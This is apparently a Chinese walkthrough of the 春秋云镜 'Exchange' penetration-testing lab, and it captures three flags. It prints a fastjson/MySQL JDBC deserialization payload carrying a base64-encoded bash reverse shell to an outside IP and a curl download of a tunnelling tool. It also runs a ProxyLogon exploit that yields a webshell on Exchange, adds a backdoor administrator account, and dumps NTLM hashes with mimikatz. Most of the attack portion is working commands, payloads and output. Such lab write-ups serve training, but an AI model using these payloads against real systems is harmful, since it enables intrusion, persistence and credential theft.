春秋云镜：Exchange

https://exp10it.cn/2023/08/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C-exchange-writeup/

https://fushuling.com/index.php/2023/10/03/%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83%c2%b7exchange/

http://www.fzwjscj.xyz/index.php/archives/49/

https://ke1nys.github.io/posts/47d3d323.html

https://zysgmzb.club/index.php/archives/238

https://gkjzjh146.github.io/post/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C-exchange/

https://su18.org/post/fastjson/ //fastjson payload

https://github.com/frohoff/ysoserial //ysoserial-all.jar

https://github.com/fnmsd/MySQL_Fake_Server //mysql_fake_server

https://github.com/hausec/ProxyLogon //ProxyLogon

https://github.com/fortra/impacket //impacket

https://github.com/ThePorgs/impacket //dacledit.py 此fork的repo有这个

https://github.com/Jumbo-WJB/PTH_Exchange //pthexchange.py

考点：

• 华夏ERP信息泄露
• fastjson 1.2.55+JDBC RCE
• ProxyLogon
• writeDacl写DCSync
• 一个比较低能的压缩包解密3

拓扑图：

172.22.3.12 本机
172.22.3.2 XIAORANG-WIN16 DC
172.22.3.9 XIAORANG-EXC01 Exchange
172.22.3.26 XIAORANG-PC

flag01

fscan扫描

./fscan.exe -h 39.101.164.140

(base) PS E:\02software\02development\13CobaltStrike45\02fscan> ./fscan.exe -h 39.101.164.140

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.3
start infoscan
39.101.164.140:80 open
39.101.164.140:8000 open
39.101.164.140:22 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle http://39.101.164.140     code:200 len:19813  title:lumia
[*] WebTitle http://39.101.164.140:8000 code:302 len:0      title:None 跳转url: http://39.101.164.140:8000/login.html
[*] WebTitle http://39.101.164.140:8000/login.html code:200 len:5662   title:Lumia ERP
已完成 3/3
[*] 扫描结束,耗时: 15.4575156s

华夏ERP信息泄露

/user/getAllList;.ico

{"code":200,"data":{"userList":[{"id":63,"username":"季圣华","loginName":"jsh","password":"e10adc3949ba59abbe56e057f20f883e","position":"","department":null,"email":"","phonenum":"","ismanager":1,"isystem":1,"status":0,"description":"","remark":null,"tenantId":63},{"id":120,"username":"管理员","loginName":"admin","password":"e10adc3949ba59abbe56e057f20f883e","position":null,"department":null,"email":null,"phonenum":null,"ismanager":1,"isystem":0,"status":0,"description":null,"remark":null,"tenantId":null},{"id":131,"username":"测试用户","loginName":"test123","password":"e10adc3949ba59abbe56e057f20f883e","position":"","department":null,"email":"","phonenum":"","ismanager":1,"isystem":0,"status":0,"description":"","remark":null,"tenantId":63}]}}

admin/e10adc3949ba59abbe56e057f20f883e
admin/123456

fastjson 1.2.55 RCE

MySQL JDBC 反序列化相关的 payload

{
	"@type": "java.lang.AutoCloseable",
	"@type": "com.mysql.jdbc.JDBC4Connection",
	"hostToConnectTo": "39.105.51.11",
	"portToConnectTo": 3306,
	"url": "jdbc:mysql://39.105.51.11:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
	"databaseToConnectTo": "test",
	"info": {
		"@type": "java.util.Properties",
		"PORT": "3306",
		"statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
		"autoDeserialize": "true",
		"user": "root",
		"PORT.1": "3306",
		"HOST.1": "39.105.51.11",
		"NUM_HOSTS": "1",
		"HOST": "39.105.51.11",
		"DBNAME": "test"
	}
}

e…这样子来

#config.json配置(ysoserial-all.jar和server.py放一起)，bash -c后面替换成base64后反弹shell的payload
{
    "config":{
        "ysoserialPath":"ysoserial-all.jar",
        "javaBinPath":"java",
        "fileOutputDir":"./fileOutput/",
        "displayFileContentOnScreen":true,
        "saveToFile":true
    },
    "fileread":{
        "win_ini":"c:\\windows\\win.ini",
        "win_hosts":"c:\\windows\\system32\\drivers\\etc\\hosts",
        "win":"c:\\windows\\",
        "linux_passwd":"/etc/passwd",
        "linux_hosts":"/etc/hosts",
        "index_php":"index.php",
        "ssrf":"https://www.baidu.com/",
        "__defaultFiles":["/etc/hosts","c:\\windows\\system32\\drivers\\etc\\hosts"]
    },
    "yso":{
        "Jdk7u21":["Jdk7u21","calc"],
        "CommonsCollections6":["CommonCollections6","bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8zOS4xMDUuNTEuMTEvNzc3OSAwPiYx}|{base64,-d}|{bash,-i}"]
    }
}

#记录一下初始的config.json
{
    "config":{
        "ysoserialPath":"ysoserial-0.0.6-SNAPSHOT-all.jar",
        "javaBinPath":"java",
        "fileOutputDir":"./fileOutput/",
        "displayFileContentOnScreen":true,
        "saveToFile":true
    },
    "fileread":{
        "win_ini":"c:\\windows\\win.ini",
        "win_hosts":"c:\\windows\\system32\\drivers\\etc\\hosts",
        "win":"c:\\windows\\",
        "linux_passwd":"/etc/passwd",
        "linux_hosts":"/etc/hosts",
        "index_php":"index.php",
        "ssrf":"https://www.baidu.com/",
        "__defaultFiles":["/etc/hosts","c:\\windows\\system32\\drivers\\etc\\hosts"]
    },
    "yso":{
        "Jdk7u21":["Jdk7u21","calc"]
    }
}

{
	"name": {
		"@type": "java.lang.AutoCloseable",
		"@type": "com.mysql.jdbc.JDBC4Connection",
		"hostToConnectTo": "39.105.51.11",
		"portToConnectTo": 3306,
		"info": {
			"user": "yso_CommonsCollections6_bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8zOS4xMDUuNTEuMTEvNzc3OSAwPiYx}|{base64,-d}|{bash,-i}",
			"password": "pass",
			"statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
			"autoDeserialize": "true",
			"NUM_HOSTS": "1"
		}
	}
}

%7B%0D%0A%09%22name%22%3A%20%7B%0D%0A%09%09%22%40type%22%3A%20%22java%2Elang%2EAutoCloseable%22%2C%0D%0A%09%09%22%40type%22%3A%20%22com%2Emysql%2Ejdbc%2EJDBC4Connection%22%2C%0D%0A%09%09%22hostToConnectTo%22%3A%20%2239%2E105%2E51%2E11%22%2C%0D%0A%09%09%22portToConnectTo%22%3A%203306%2C%0D%0A%09%09%22info%22%3A%20%7B%0D%0A%09%09%09%22user%22%3A%20%22yso%5FCommonsCollections6%5Fbash%20%2Dc%20%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8zOS4xMDUuNTEuMTEvNzc3OSAwPiYx%7D%7C%7Bbase64%2C%2Dd%7D%7C%7Bbash%2C%2Di%7D%22%2C%0D%0A%09%09%09%22password%22%3A%20%22pass%22%2C%0D%0A%09%09%09%22statementInterceptors%22%3A%20%22com%2Emysql%2Ejdbc%2Einterceptors%2EServerStatusDiffInterceptor%22%2C%0D%0A%09%09%09%22autoDeserialize%22%3A%20%22true%22%2C%0D%0A%09%09%09%22NUM%5FHOSTS%22%3A%20%221%22%0D%0A%09%09%7D%0D%0A%09%7D%0D%0A%7D

GET /user/list?search=<urlencoded-payload> HTTP/1.1
Host: IP:8000
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://39.99.147.55:8000/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=AF23A4BF7BFE76BD694B34B77EAA7AA7
Connection: close

GET /user/list?search=%7B%0D%0A%09%22name%22%3A%20%7B%0D%0A%09%09%22%40type%22%3A%20%22java%2Elang%2EAutoCloseable%22%2C%0D%0A%09%09%22%40type%22%3A%20%22com%2Emysql%2Ejdbc%2EJDBC4Connection%22%2C%0D%0A%09%09%22hostToConnectTo%22%3A%20%2239%2E105%2E51%2E11%22%2C%0D%0A%09%09%22portToConnectTo%22%3A%203306%2C%0D%0A%09%09%22info%22%3A%20%7B%0D%0A%09%09%09%22user%22%3A%20%22yso%5FCommonsCollections6%5Fbash%20%2Dc%20%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8zOS4xMDUuNTEuMTEvNzc3OSAwPiYx%7D%7C%7Bbase64%2C%2Dd%7D%7C%7Bbash%2C%2Di%7D%22%2C%0D%0A%09%09%09%22password%22%3A%20%22pass%22%2C%0D%0A%09%09%09%22statementInterceptors%22%3A%20%22com%2Emysql%2Ejdbc%2Einterceptors%2EServerStatusDiffInterceptor%22%2C%0D%0A%09%09%09%22autoDeserialize%22%3A%20%22true%22%2C%0D%0A%09%09%09%22NUM%5FHOSTS%22%3A%20%221%22%0D%0A%09%09%7D%0D%0A%09%7D%0D%0A%7D HTTP/1.1
Host: 39.101.164.140:8000
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://39.99.147.55:8000/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=660DFEE547B9DC596797ADB9F393722E
Connection: close

cc6反弹shell，

nc -lvvp 7779

cat /root/flag/flag01.txt
 ██     ██ ██     ██       ███████   ███████       ██     ████     ██   ████████ 
░░██   ██ ░██    ████     ██░░░░░██ ░██░░░░██     ████   ░██░██   ░██  ██░░░░░░██
 ░░██ ██  ░██   ██░░██   ██     ░░██░██   ░██    ██░░██  ░██░░██  ░██ ██      ░░ 
  ░░███   ░██  ██  ░░██ ░██      ░██░███████    ██  ░░██ ░██ ░░██ ░██░██         
   ██░██  ░██ ██████████░██      ░██░██░░░██   ██████████░██  ░░██░██░██    █████
  ██ ░░██ ░██░██░░░░░░██░░██     ██ ░██  ░░██ ░██░░░░░░██░██   ░░████░░██  ░░░░██
 ██   ░░██░██░██     ░██ ░░███████  ░██   ░░██░██     ░██░██    ░░███ ░░████████ 
░░     ░░ ░░ ░░      ░░   ░░░░░░░   ░░     ░░ ░░      ░░ ░░      ░░░   ░░░░░░░░  

                        |  |  ||  | /~~\  /\  |\  /|~|~
                        |  |  ||--||    |/__\ | \/ | | 
                         \/ \/ |  | \__//    \|    |_|_

              flag01: flag{df1c5a91-8309-45db-8058-6e12146d9637}

flag02

下载工具

curl -o /tmp/chisel 39.105.51.11/chisel
cd /tmp && chmod +x chisel && ./chisel client 39.105.51.11:28190 R:0.0.0.0:28191:socks

fscan扫内网

./fscan -h 172.22.3.0/24

.9机器Exchange Server 2016打ProxyLogon【python2】

proxychains4 -f /etc/proxychains4.conf python2 proxylogon.py 172.22.3.9 administrator@xiaorang.lab

┌──(kali㉿kali)-[~/tools/impacket-master/examples]
└─$ proxychains4 -f /etc/proxychains4.conf python2 proxylogon.py 172.22.3.9 administrator@xiaorang.lab
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16

  _____                     _                             
 |  __ \                   | |                            
 | |__) | __ _____  ___   _| |     ___   __ _  ___  _ __  
 |  ___/ '__/ _ \ \/ / | | | |    / _ \ / _` |/ _ \| '_ \ 
 | |   | | | (_) >  <| |_| | |___| (_) | (_| | (_) | | | |
 |_|   |_|  \___/_/\_ \__, |______\___/ \__, |\___/|_| |_|
                       __/ |             __/ |            
                      |___/             |___/                                                                     
                                                                                                                          
Original PoC by https://github.com/testanull
Author: @Haus3c                                                                                        
                                                                                                                                                             
  
Target: 172.22.3.9
=============================
[+] Attempting SSRF
[proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.3.9:443  ...  OK
[proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.3.9:443  ...  OK
DN: /o=XIAORANG LAB/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=8ca6ff254802459d9f63ee916eabb487-Administrat
[proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.3.9:443  ...  OK
SID: S-1-5-21-533686307-2117412543-4200729784-500
[+] SSRF Successful!
[+] Attempting Arbitrary File Write
[proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.3.9:443  ...  OK
SessionID: 10a8538e-25f5-45ea-85db-96556a14cb07
CanaryToken: bq3gXrkIcE6g-PlCa67w0bNuf9-l_NsI-TdsbyWir_kp2386ck9RijTnDEUfD4lt2BsofCB95R4.
[proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.3.9:443  ...  OK
[proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.3.9:443  ...  OK
OABId: 6d8fb74b-8477-43ee-83ba-0b119205e85f
[proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.3.9:443  ...  OK
[proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.3.9:443  ...  OK
[+] Success! Entering webshell. Type 'quit' or 'exit' to escape.

# 

得到shell添加用户 或者 写webshell蚁剑连接【administrators】

net user jerem1ah qwer1234 /add
net localgroup administrators jerem1ah /add

# net user jerem1ah qwer1234 /add
[proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.3.9:443  ...  OK
命令成功完成。


# net localgroup administrator jerem1ah /add
[proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.3.9:443  ...  OK

# net localgroup administrators jerem1ah /add    
[proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.3.9:443  ...  OK
命令成功完成。

rdp登录拿flag

jerem1ah/qwer1234

Yb  dP 88    db     dP"Yb  88""Yb    db    88b 88  dP""b8 
 YbdP  88   dPYb   dP   Yb 88__dP   dPYb   88Yb88 dP   `" 
 dPYb  88  dP__Yb  Yb   dP 88"Yb   dP__Yb  88 Y88 Yb  "88 
dP  Yb 88 dP""""Yb  YbodP  88  Yb dP""""Yb 88  Y8  YboodP 


    / /                                        
   / /                  _   __     ( )  ___    
  / /        //   / / // ) )  ) ) / / //   ) ) 
 / /        //   / / // / /  / / / / //   / /  
/ /____/ / ((___( ( // / /  / / / / ((___( (   



flag02: flag{0b3dabfd-626e-46d2-873f-caca6656255d}

flag03

传mimikatz抓密码【注意86还是64】

./mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > 1.txt

  .#####.   mimikatz 2.2.0 (x86) #18362 Feb 29 2020 11:13:10
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(commandline) # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

mimikatz(commandline) # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

mimikatz(commandline) # exit
Bye!

用管理员权限

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; mimikatz x86 cannot access x64 process

还是不行，换个64的把

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 9397577 (00000000:008f6549)
Session           : RemoteInteractive from 3
User Name         : jerem1ah
Domain            : XIAORANG-EXC01
Logon Server      : XIAORANG-EXC01
Logon Time        : 2023/12/12 21:17:12
SID               : S-1-5-21-804691931-3750513266-524628342-1000
        msv :
         [00000003] Primary
         * Username : jerem1ah
         * Domain   : XIAORANG-EXC01
         * NTLM     : 0a640404b5c386ab12092587fe19cd02
         * SHA1     : c1c5df70d2547d43e891bed7c408177580788726
        tspkg :
        wdigest :
         * Username : jerem1ah
         * Domain   : XIAORANG-EXC01
         * Password : (null)
        kerberos :
         * Username : jerem1ah
         * Domain   : XIAORANG-EXC01
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 9390501 (00000000:008f49a5)
Session           : Interactive from 3
User Name         : DWM-3
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/12/12 21:17:12
SID               : S-1-5-90-0-3
        msv :
         [00000003] Primary
         * Username : XIAORANG-EXC01$
         * Domain   : XIAORANG
         * NTLM     : 0da54b8de678c4d8b254fce9d1081030
         * SHA1     : b250f5f4ef29959e68d1143023cfbfbae5c39f3f
        tspkg :
        wdigest :
         * Username : XIAORANG-EXC01$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XIAORANG-EXC01$
         * Domain   : xiaorang.lab
         * Password : 54 3b 31 cd 9a e1 74 c9 43 d1 53 41 ff e9 dd ea 15 be 3a 73 a8 12 8b 4c 82 e0 e8 84 ed 88 0d 13 a4 94 12 d4 b3 29 a3 60 b7 d8 92 cc 7b 67 d3 e5 57 9e be 91 77 b6 8a dc b7 a0 fd b0 e1 4b 87 52 0a c5 41 96 c4 1f 60 df 3d 78 5d 32 72 35 47 ef e0 d3 d3 79 cd 34 07 72 9f 12 9b e1 5a e4 c4 bc c0 aa c9 32 28 26 2d 54 03 ca f7 6b b6 d1 d1 5e 33 b8 03 45 f0 f7 fb cf 8b e3 23 2a eb c0 2e c9 fd 6c cc 50 48 b6 87 bc a3 f5 9a 8e cd b7 29 f2 cf 5b 33 61 92 fd f2 94 02 8e 6f 74 1e 5c ff bd fa 24 d7 c9 3c d6 31 be 2d 05 38 78 d8 f0 a0 39 53 eb b5 8e 38 bc 1b 1b 7b 11 c2 79 e1 fb 56 c7 39 25 f0 6f a9 f9 47 78 59 3e 40 2c e9 15 10 98 35 69 ef b7 5f 1a 9d a0 dc 79 dc 3a fb 6f 0a ae eb dc 25 9b 50 3b cc 4d 24 d8 29 1f eb 49 39 63
        ssp :
        credman :

Authentication Id : 0 ; 2050600 (00000000:001f4a28)
Session           : RemoteInteractive from 2
User Name         : Zhangtong
Domain            : XIAORANG
Logon Server      : XIAORANG-WIN16
Logon Time        : 2023/12/12 20:52:16
SID               : S-1-5-21-533686307-2117412543-4200729784-1147
        msv :
         [00000003] Primary
         * Username : Zhangtong
         * Domain   : XIAORANG
         * NTLM     : 22c7f81993e96ac83ac2f3f1903de8b4
         * SHA1     : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e
         * DPAPI    : ed14c3c4ef895b1d11b04fb4e56bb83b
        tspkg :
        wdigest :
         * Username : Zhangtong
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : Zhangtong
         * Domain   : XIAORANG.LAB
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 1990297 (00000000:001e5e99)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/12/12 20:52:14
SID               : S-1-5-90-0-2
        msv :
         [00000003] Primary
         * Username : XIAORANG-EXC01$
         * Domain   : XIAORANG
         * NTLM     : 0da54b8de678c4d8b254fce9d1081030
         * SHA1     : b250f5f4ef29959e68d1143023cfbfbae5c39f3f
        tspkg :
        wdigest :
         * Username : XIAORANG-EXC01$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XIAORANG-EXC01$
         * Domain   : xiaorang.lab
         * Password : 54 3b 31 cd 9a e1 74 c9 43 d1 53 41 ff e9 dd ea 15 be 3a 73 a8 12 8b 4c 82 e0 e8 84 ed 88 0d 13 a4 94 12 d4 b3 29 a3 60 b7 d8 92 cc 7b 67 d3 e5 57 9e be 91 77 b6 8a dc b7 a0 fd b0 e1 4b 87 52 0a c5 41 96 c4 1f 60 df 3d 78 5d 32 72 35 47 ef e0 d3 d3 79 cd 34 07 72 9f 12 9b e1 5a e4 c4 bc c0 aa c9 32 28 26 2d 54 03 ca f7 6b b6 d1 d1 5e 33 b8 03 45 f0 f7 fb cf 8b e3 23 2a eb c0 2e c9 fd 6c cc 50 48 b6 87 bc a3 f5 9a 8e cd b7 29 f2 cf 5b 33 61 92 fd f2 94 02 8e 6f 74 1e 5c ff bd fa 24 d7 c9 3c d6 31 be 2d 05 38 78 d8 f0 a0 39 53 eb b5 8e 38 bc 1b 1b 7b 11 c2 79 e1 fb 56 c7 39 25 f0 6f a9 f9 47 78 59 3e 40 2c e9 15 10 98 35 69 ef b7 5f 1a 9d a0 dc 79 dc 3a fb 6f 0a ae eb dc 25 9b 50 3b cc 4d 24 d8 29 1f eb 49 39 63
        ssp :
        credman :

Authentication Id : 0 ; 64251 (00000000:0000fafb)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/12/12 20:50:15
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : XIAORANG-EXC01$
         * Domain   : XIAORANG
         * NTLM     : 9587463cfa3fd1ea760c401e2c52e224
         * SHA1     : 162fc915ffccfa73c6f53b3c92f02690ccf7831c
        tspkg :
        wdigest :
         * Username : XIAORANG-EXC01$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XIAORANG-EXC01$
         * Domain   : xiaorang.lab
         * Password : 12 ae e6 f2 22 80 c0 a3 cd 84 c9 94 de ef 96 52 79 ff ea 99 f6 9c 67 48 10 08 e7 99 1a fa 51 11 ad b6 c1 79 cc 6d 04 b2 22 01 47 b0 53 b5 7e ff df 04 21 34 ae 7b ee c9 cf b1 c1 d3 c0 63 d3 d7 6a f2 3a 38 83 ac cf d2 93 7b d3 0b bb d6 a5 8d 7c cd f1 77 65 0b 8c 77 dd 98 49 3c 21 f0 5d fc a7 8f c7 e0 5b f7 96 4d d2 46 14 81 8f 4f a7 a4 27 11 09 03 f9 f4 0d ce 71 4d 8d 64 c3 a9 6b 5c 4a 77 ba ac 33 1a 49 60 11 bd 4d b2 1e 98 05 1a c1 03 5b c6 cf 4e 1c d3 83 10 52 51 68 c4 b1 e0 65 c2 36 f3 a6 3f 66 c6 95 8c 3d 47 ab 9b cb 35 bd 53 f0 6f 13 ae 48 28 5e cf 5b ee 45 ce 7f 10 47 aa e6 f0 d3 09 c0 b3 ad ef 24 00 c5 c8 f0 7f a5 06 93 0e f5 a4 2a ec d0 25 96 4d a4 88 d3 55 94 d9 94 81 ef 8b ba 9e 89 b6 36 dc 88 64 8d 96
        ssp :
        credman :

Authentication Id : 0 ; 64203 (00000000:0000facb)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/12/12 20:50:15
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : XIAORANG-EXC01$
         * Domain   : XIAORANG
         * NTLM     : 0da54b8de678c4d8b254fce9d1081030
         * SHA1     : b250f5f4ef29959e68d1143023cfbfbae5c39f3f
        tspkg :
        wdigest :
         * Username : XIAORANG-EXC01$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XIAORANG-EXC01$
         * Domain   : xiaorang.lab
         * Password : 54 3b 31 cd 9a e1 74 c9 43 d1 53 41 ff e9 dd ea 15 be 3a 73 a8 12 8b 4c 82 e0 e8 84 ed 88 0d 13 a4 94 12 d4 b3 29 a3 60 b7 d8 92 cc 7b 67 d3 e5 57 9e be 91 77 b6 8a dc b7 a0 fd b0 e1 4b 87 52 0a c5 41 96 c4 1f 60 df 3d 78 5d 32 72 35 47 ef e0 d3 d3 79 cd 34 07 72 9f 12 9b e1 5a e4 c4 bc c0 aa c9 32 28 26 2d 54 03 ca f7 6b b6 d1 d1 5e 33 b8 03 45 f0 f7 fb cf 8b e3 23 2a eb c0 2e c9 fd 6c cc 50 48 b6 87 bc a3 f5 9a 8e cd b7 29 f2 cf 5b 33 61 92 fd f2 94 02 8e 6f 74 1e 5c ff bd fa 24 d7 c9 3c d6 31 be 2d 05 38 78 d8 f0 a0 39 53 eb b5 8e 38 bc 1b 1b 7b 11 c2 79 e1 fb 56 c7 39 25 f0 6f a9 f9 47 78 59 3e 40 2c e9 15 10 98 35 69 ef b7 5f 1a 9d a0 dc 79 dc 3a fb 6f 0a ae eb dc 25 9b 50 3b cc 4d 24 d8 29 1f eb 49 39 63
        ssp :
        credman :

Authentication Id : 0 ; 9397606 (00000000:008f6566)
Session           : RemoteInteractive from 3
User Name         : jerem1ah
Domain            : XIAORANG-EXC01
Logon Server      : XIAORANG-EXC01
Logon Time        : 2023/12/12 21:17:12
SID               : S-1-5-21-804691931-3750513266-524628342-1000
        msv :
         [00000003] Primary
         * Username : jerem1ah
         * Domain   : XIAORANG-EXC01
         * NTLM     : 0a640404b5c386ab12092587fe19cd02
         * SHA1     : c1c5df70d2547d43e891bed7c408177580788726
        tspkg :
        wdigest :
         * Username : jerem1ah
         * Domain   : XIAORANG-EXC01
         * Password : (null)
        kerberos :
         * Username : jerem1ah
         * Domain   : XIAORANG-EXC01
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 995 (00000000:000003e3)
Session           : Service from 0
User Name         : IUSR
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2023/12/12 20:50:17
SID               : S-1-5-17
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : XIAORANG-EXC01$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2023/12/12 20:50:04
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : XIAORANG-EXC01$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : xiaorang-exc01$
         * Domain   : XIAORANG.LAB
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 10872568 (00000000:00a5e6f8)
Session           : NetworkCleartext from 0
User Name         : HealthMailbox0d5918e
Domain            : XIAORANG
Logon Server      : XIAORANG-WIN16
Logon Time        : 2023/12/12 21:28:39
SID               : S-1-5-21-533686307-2117412543-4200729784-1136
        msv :
         [00000003] Primary
         * Username : HealthMailbox0d5918e
         * Domain   : XIAORANG
         * NTLM     : a6542906b0dd6b0098cc64ddcf9f9b4a
         * SHA1     : e717653013914d124e01233d60355e2eac01822f
         * DPAPI    : 2f20de3d3c0edb29479c31d3d7f50a4d
        tspkg :
        wdigest :
         * Username : HealthMailbox0d5918e
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : HealthMailbox0d5918e
         * Domain   : XIAORANG.LAB
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 9390483 (00000000:008f4993)
Session           : Interactive from 3
User Name         : DWM-3
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/12/12 21:17:12
SID               : S-1-5-90-0-3
        msv :
         [00000003] Primary
         * Username : XIAORANG-EXC01$
         * Domain   : XIAORANG
         * NTLM     : 0da54b8de678c4d8b254fce9d1081030
         * SHA1     : b250f5f4ef29959e68d1143023cfbfbae5c39f3f
        tspkg :
        wdigest :
         * Username : XIAORANG-EXC01$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XIAORANG-EXC01$
         * Domain   : xiaorang.lab
         * Password : 54 3b 31 cd 9a e1 74 c9 43 d1 53 41 ff e9 dd ea 15 be 3a 73 a8 12 8b 4c 82 e0 e8 84 ed 88 0d 13 a4 94 12 d4 b3 29 a3 60 b7 d8 92 cc 7b 67 d3 e5 57 9e be 91 77 b6 8a dc b7 a0 fd b0 e1 4b 87 52 0a c5 41 96 c4 1f 60 df 3d 78 5d 32 72 35 47 ef e0 d3 d3 79 cd 34 07 72 9f 12 9b e1 5a e4 c4 bc c0 aa c9 32 28 26 2d 54 03 ca f7 6b b6 d1 d1 5e 33 b8 03 45 f0 f7 fb cf 8b e3 23 2a eb c0 2e c9 fd 6c cc 50 48 b6 87 bc a3 f5 9a 8e cd b7 29 f2 cf 5b 33 61 92 fd f2 94 02 8e 6f 74 1e 5c ff bd fa 24 d7 c9 3c d6 31 be 2d 05 38 78 d8 f0 a0 39 53 eb b5 8e 38 bc 1b 1b 7b 11 c2 79 e1 fb 56 c7 39 25 f0 6f a9 f9 47 78 59 3e 40 2c e9 15 10 98 35 69 ef b7 5f 1a 9d a0 dc 79 dc 3a fb 6f 0a ae eb dc 25 9b 50 3b cc 4d 24 d8 29 1f eb 49 39 63
        ssp :
        credman :

Authentication Id : 0 ; 2123297 (00000000:00206621)
Session           : NetworkCleartext from 0
User Name         : HealthMailbox0d5918e
Domain            : XIAORANG
Logon Server      : XIAORANG-WIN16
Logon Time        : 2023/12/12 20:52:17
SID               : S-1-5-21-533686307-2117412543-4200729784-1136
        msv :
         [00000003] Primary
         * Username : HealthMailbox0d5918e
         * Domain   : XIAORANG
         * NTLM     : 3d415bf5c187ab1ab2406cb5154f886c
         * SHA1     : 7555574ecdc3e26043e2e3613141d01ffed66a3a
         * DPAPI    : f116f79ace23c7e0a37be30044c58568
        tspkg :
        wdigest :
         * Username : HealthMailbox0d5918e
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : HealthMailbox0d5918e
         * Domain   : XIAORANG.LAB
         * Password : (null)
        ssp :
        credman :

